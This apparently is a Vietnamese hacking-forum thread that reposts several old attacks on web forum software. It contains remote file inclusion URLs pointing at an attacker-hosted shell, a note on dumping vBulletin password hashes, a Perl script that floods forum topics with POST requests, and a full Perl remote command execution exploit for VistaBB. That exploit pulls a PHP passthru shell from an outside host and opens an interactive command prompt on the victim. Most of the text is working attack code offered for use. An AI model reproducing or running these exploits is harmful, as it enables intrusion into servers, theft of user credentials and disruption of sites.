black_hat_cr(HCE) vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities Code: * Portal Name :Vortex Blog AKA vBlog * Class = Remote File Inclusion ; * Download =http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip * Found by = Dr.Pantagon (rezayavari2006@yahoo.com) - Vulnerable Code include($cfgProgDir . "session.php"); ++++++++++++++++++++++++++++++++++++++++++++ - Exploit: http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell? http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/sh ell? Black_hat_cr(HCE) vBulletin 3.5.4 (install_path) Exploit by: CarcaBot - application : vbulletin - URL : http://www.vbulletin.com - Exploit: http://www.vicitimsite.com/forumpath =http://CarcaB ot.Ro - More Details: Dump SQL DB named user then u have access at all md5 users passwords vns3curity(HCE) View Topic Flood phpBB, MercuryBoard, Vbulletin, Ipb Hàng copy Code: #!/usr/bin/perl print q{ __________________________________________________________________ _______ >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>> / \ \ \ ,, / / ' `\()/` ' _'( )'_ / /` /`""`\ `\ \ * SpiderZ ForumZ Security * | | >< | | \ \ / / '.__.' => View Topic Flood phpBB, MercuryBoard, Vbulletin, Ipb => Sito: www.spiderz.altervista.org => Sito2: www.spiderz.netsons.org => Author: SpiderZ => Bug trovato da Gaggo, Exploit creato da SpiderZ __________________________________________________________________ _______ >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>> }; use IO::Socket; print q{ => Exploit created by: SpiderZ => Inserisci l'url del sito => senza inserire ( www - HTTP ) => }; $host = <STDIN>; chop ($host); print q{ => Indica la cartella => cartella: ( /Forum/ ) => }; $pth = <STDIN>; chop ($pth); print q{ => phpBB ( viewtopic.php?t= ) => MercuryBoard ( index.php?a=topic&t= ) => Vbulletin ( showthread.php?t= ) => Ipb ( index.php?showtopic= ) => }; $t = <STDIN>; chop ($t); print q{ => Numero Topic => Es: viewtopic.php?t=1 ( 1, 2, 3, ecc ) => }; $topic = <STDIN>; chop ($topic); print q{ => Quante volte vuoi fare il flood ? ( 1 / 10000 ) => }; $while = <STDIN>; chop ($while); while($x != $while ) { $lrg = length $postit; my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80", Proto => "tcp", ); die "\nThe Socket: $!\n" unless $sock; print $sock "POST $pth"."$t$topic HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Referer: $host\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); syswrite STDOUT, "."; $x++; } print q{ => Attacco Completato ! => www.spiderz.tk }; black_hat_cr(HCE) VistaBB <= 2.x Multiple File Inclusion Ếch bờ loi bằng perl : Trích: #!/usr/bin/perl # Method found and exploit scripted by nukedx # Contacts> ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: nukedx@nukedx.com # Original advisory can be found at: http://www.nukedx.com/?viewdoc=48 # # VistaBB <= 2.x Remote Command Execution Exploit # # This exploit comes with it's own php shell setting. If you wanna change it your file must contain this data > # # <?php # echo "_START_\n"; # ini_set("max_execution_time",0); # error_reporting(0); # passthru($_REQUEST[command]); # echo "\n_END_"; # ?> # # Copyright 2006 (C) nukedx # # Greetz to: WW,xT,php from my team NWPX , str0ke , cha0s , Preddy , Yns , |SaMaN|, Caesar , Ogre and all of my friends use IO::Socket; # Default configuration $shell = "http://hometown.aol.com/yarivgiladi/sh.php"; # Checking user settings if(@ARGV != 2) { usage(); } else { exploit(); } sub header() { print "\n- NukedX Security Advisory Nr.2006-44\r\n"; print "- VistaBB <= 2.x Remote Command Execution Exploit\r\n"; } sub usage() { header(); print "- Usage: $0 <host> <path>\r\n"; print "- <host> -> Victim's host ex: www.victim.com\r\n"; print "- <path> -> Path to VistaBB ex: /vistabb/ or just /\r\n"; exit(); } sub exploit() { # User variables $host = $ARGV[0]; $host =~ s/(http:\/\/)//eg; $target = $ARGV[1]."includes/functions_mod_user.php"; $good = 0; $c2s = "command=whoami"; $c2slen = length($c2s); print "Trying to connect: $host\r\n"; $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "Connection failed \r\n"; print "Connected to victim: $host\r\n"; print $sock "POST $target HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: */*\n"; print $sock "Referer: $host\r\n"; print $sock "Accept-Language: tr\r\n"; print $sock "Content-Type: application/x-www-form-urlencoded\r\n"; print $sock "Accept-Encoding: gzip, deflate\r\n"; print $sock "User-Agent: NukeZilla\r\n"; print $sock "Cookie: phpbb_root_path=".$shell."?\r\n"; print $sock "Content-length: $c2slen\r\n"; print $sock "Connection: Keep-Alive\r\n"; print $sock "Cache-Control: no-cache\r\n\r\n"; print $sock $c2s; print $sock "\r\n\r\n"; while($result = <$sock>) { if($result =~ /^_END_/) { $good=0; close($sock); } if($good==1) { if (!$whoami) { $whoami = trim($result); print "Logged as $whoami\r\nType exit for exit dont press ctrl+c\r\n"; } } if ($good==0) { if ($result =~ /Warning: include_once/) { print "Sorry victim is not vulnerable \r\nClosing exploit \r\n";sleep(3);exit(); } } if($result =~ /^_START_/) { $good=1; } } while() { print "[".$whoami."@".$host." /]\$ "; while(<STDIN>) { $cmds=$_; chomp($cmds); last; } if ($cmds =~ /^exit/) { print "Closing exploit \r\n";sleep(3);exit(); } else { sendcmd(); } } } sub sendcmd () { $c2s = "command=".$cmds; $c2slen = length($c2s); $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "Connection lost \r\n"; print $sock "POST $target HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: */*\n"; print $sock "Referer: $host\r\n"; print $sock "Accept-Language: tr\r\n"; print $sock "Content-Type: application/x-www-form-urlencoded\r\n"; print $sock "Accept-Encoding: gzip, deflate\r\n"; print $sock "User-Agent: NukeZilla\r\n"; print $sock "Cookie: phpbb_root_path=".$shell."?\r\n"; print $sock "Content-length: $c2slen\r\n"; print $sock "Connection: Keep-Alive\r\n"; print $sock "Cache-Control: no-cache\r\n\r\n"; print $sock $c2s; print $sock "\r\n\r\n"; while($result = <$sock>) { if($result =~ /^_END_/) { $good=0; close($sock); } if($good==1) { print $result; } if ($good==0) { if ($result =~ /Warning: include_once/) { print "Sorry victim is not vulnerable or patched! \r\nClosing exploit \r\n";sleep(3);exit(); } } if($result =~ /^_START_/) { $good=1; } } } sub trim($) { my $string = shift; $string =~ s/^\s+//; $string =~ s/\s+$//; return $string; }